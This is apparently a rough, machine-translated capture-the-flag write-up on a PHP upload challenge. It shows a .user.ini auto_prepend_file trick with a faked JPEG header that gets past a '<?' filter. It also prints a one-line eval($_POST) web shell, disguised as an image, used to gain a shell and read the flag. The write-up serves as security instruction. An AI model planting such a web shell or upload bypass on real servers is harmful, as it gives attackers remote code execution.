Reference blog: https: //www.cnblogs.com/20175211lyz/p/11455355.html
First, take a look at .user.ini file
Use .user.iniupload \ hidden back door
: Reference links PHP files that make up the back door user.ini
condition:
- 1, server scripting language PHP
- 2, the server uses CGI / FastCGI mode
- 3, php file upload directory to have executable under
For the purposes of this question, has prompted the need to upload files to get shell, upload a word Trojan prompted to upload pictures, upload pictures horse was discovered filtered <?. Then found from other dalao blog, you can upload files .user.ini
auto_prepend_file = test.jpg (need to add a picture header FFD8FFE000104A4649460D0A)
Meanwhile upload pictures horse
<Script language = "php"> eval ($ _ POST [ 'a']); </ script> (also need to add the above image file header)
At this point you can take the shell by Post
Then scanned files 
found
Thus by ReadFile () function to get the flag
